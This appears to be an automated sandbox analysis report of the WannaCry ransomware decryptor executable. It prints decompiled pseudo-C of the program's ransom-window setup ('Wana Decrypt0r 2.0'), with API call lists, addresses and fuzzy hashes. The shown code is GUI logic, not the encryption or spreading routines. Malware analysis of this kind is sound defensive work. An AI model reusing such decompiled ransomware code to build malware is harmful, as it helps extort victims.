				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}










                                                      0x004060e0
                                                      0x004060e2
                                                      0x004060ed
                                                      0x004060ee
                                                      0x004060f5
                                                      0x004060fe
                                                      0x00406100
                                                      0x00406101
                                                      0x00406103
                                                      0x00406107
                                                      0x00406113
                                                      0x00406117
                                                      0x0040611c
                                                      0x00406128
                                                      0x0040612f
                                                      0x00406134
                                                      0x00406140
                                                      0x00406147
                                                      0x0040614c
                                                      0x00406158
                                                      0x0040615d
                                                      0x00406168
                                                      0x0040616d
                                                      0x00406178
                                                      0x0040617d
                                                      0x00406188
                                                      0x0040618d
                                                      0x00406198
                                                      0x0040619d
                                                      0x004061a8
                                                      0x004061ad
                                                      0x004061b8
                                                      0x004061bd
                                                      0x004061c8
                                                      0x004061cd
                                                      0x004061d8
                                                      0x004061df
                                                      0x004061e4
                                                      0x004061f0
                                                      0x004061f7
                                                      0x00406202
                                                      0x00406209
                                                      0x00406214
                                                      0x00406219
                                                      0x00406224
                                                      0x00406229
                                                      0x00406233
                                                      0x00406239
                                                      0x0040623f
                                                      0x00406245
                                                      0x0040624b
                                                      0x00406251
                                                      0x00406257
                                                      0x0040625d
                                                      0x00406263
                                                      0x00406269
                                                      0x0040626f
                                                      0x00406275
                                                      0x0040627b
                                                      0x00406281
                                                      0x00406287
                                                      0x0040628d
                                                      0x00406293
                                                      0x00406299
                                                      0x0040629f
                                                      0x004062a5
                                                      0x004062ab
                                                      0x004062b1
                                                      0x004062c1
                                                      0x004062c6
                                                      0x004062cb
                                                      0x004062d5
                                                      0x004062db
                                                      0x004062e5
                                                      0x004062ec
                                                      0x004062f1
                                                      0x004062f7
                                                      0x004062fc
                                                      0x00406303
                                                      0x00406308
                                                      0x00406313
                                                      0x00406318
                                                      0x0040631d
                                                      0x00406322
                                                      0x00406329
                                                      0x0040632f
                                                      0x00406335
                                                      0x00406340
                                                      0x00406346
                                                      0x0040634c
                                                      0x00406352
                                                      0x00406358
                                                      0x00406361
                                                      0x0040636d
                                                      0x00406377

                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                                      0x00405a60
                                                      0x00405a62
                                                      0x00405a6d
                                                      0x00405a6e
                                                      0x00405a85
                                                      0x00405a8a
                                                      0x00405a8c
                                                      0x00405a96
                                                      0x00405a9b
                                                      0x00405aa6
                                                      0x00405ab3
                                                      0x00405abe
                                                      0x00405ac1
                                                      0x00405ad2
                                                      0x00405add
                                                      0x00405ae4
                                                      0x00405af0
                                                      0x00405af8
                                                      0x00405aff
                                                      0x00405b0b
                                                      0x00405b13
                                                      0x00405b1a
                                                      0x00405b2b
                                                      0x00405b33
                                                      0x00405b3a
                                                      0x00405b46
                                                      0x00405b4e
                                                      0x00405b55
                                                      0x00405b61
                                                      0x00405b69
                                                      0x00405b70
                                                      0x00405b7c
                                                      0x00405b84
                                                      0x00405b8b
                                                      0x00405b90
                                                      0x00405b98
                                                      0x00405ba6
                                                      0x00405bb2
                                                      0x00405bba
                                                      0x00405bc1
                                                      0x00405bcd
                                                      0x00405bd5
                                                      0x00405bdc
                                                      0x00405be8
                                                      0x00405bf0
                                                      0x00405bf7
                                                      0x00405c03
                                                      0x00405c0b
                                                      0x00405c17
                                                      0x00405c1f
                                                      0x00405c2b
                                                      0x00405c33
                                                      0x00405c3f
                                                      0x00405c47
                                                      0x00405c53
                                                      0x00405c5b
                                                      0x00405c67
                                                      0x00405c6f
                                                      0x00405c7b
                                                      0x00405c83
                                                      0x00405c8f
                                                      0x00405c97
                                                      0x00405ca3
                                                      0x00405cab
                                                      0x00405cb7
                                                      0x00405cbf
                                                      0x00405ccb
                                                      0x00405cd3
                                                      0x00405cdf
                                                      0x00405ce7
                                                      0x00405cf3
                                                      0x00405cfb
                                                      0x00405d07
                                                      0x00405d0f
                                                      0x00405d1b
                                                      0x00405d23
                                                      0x00405d2f
                                                      0x00405d37
                                                      0x00405d43
                                                      0x00405d4b
                                                      0x00405d54
                                                      0x00405d5c
                                                      0x00405d65
                                                      0x00405d70
                                                      0x00405d7f
                                                      0x00405d8c

                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 3942368781-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 129 407a90-407ab7 130 407bf4-407c28 #2385 129->130 131 407abd-407ac5 129->131 132 407ac7 131->132 133 407aca-407ad1 131->133 132->133 133->130 134 407ad7-407af9 call 404c40 #2514 133->134 137 407b72-407bef #2414 * 2 #800 #641 134->137 138 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 134->138 137->130 138->137
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                                      0x00407a96
                                                      0x00407a98
                                                      0x00407a9d
                                                      0x00407aa2
                                                      0x00407aa9
                                                      0x00407ab5
                                                      0x00407ab7
                                                      0x00407abd
                                                      0x00407ac5
                                                      0x00407ac7
                                                      0x00407ac7
                                                      0x00407ad1
                                                      0x00407add
                                                      0x00407ae6
                                                      0x00407af1
                                                      0x00407af9
                                                      0x00407afb
                                                      0x00407b04
                                                      0x00407b09
                                                      0x00407b12
                                                      0x00407b1a
                                                      0x00407b27
                                                      0x00407b28
                                                      0x00407b2d
                                                      0x00407b2f
                                                      0x00407b35
                                                      0x00407b3a
                                                      0x00407b3c
                                                      0x00407b42
                                                      0x00407b47
                                                      0x00407b50
                                                      0x00407b55
                                                      0x00407b5c
                                                      0x00407b65
                                                      0x00407b6d
                                                      0x00407b6d
                                                      0x00407b72
                                                      0x00407b81
                                                      0x00407b89
                                                      0x00407b91
                                                      0x00407b99
                                                      0x00407ba2
                                                      0x00407baa
                                                      0x00407bae
                                                      0x00407bba
                                                      0x00407bc2
                                                      0x00407bcb
                                                      0x00407bd3
                                                      0x00407bdb
                                                      0x00407be4
                                                      0x00407bef
                                                      0x00407bef
                                                      0x00407ad1
                                                      0x00407bfb
                                                      0x00407c09
                                                      0x00407c0a
                                                      0x00407c0b
                                                      0x00407c0e
                                                      0x00407c1b
                                                      0x00407c28

                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 141 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
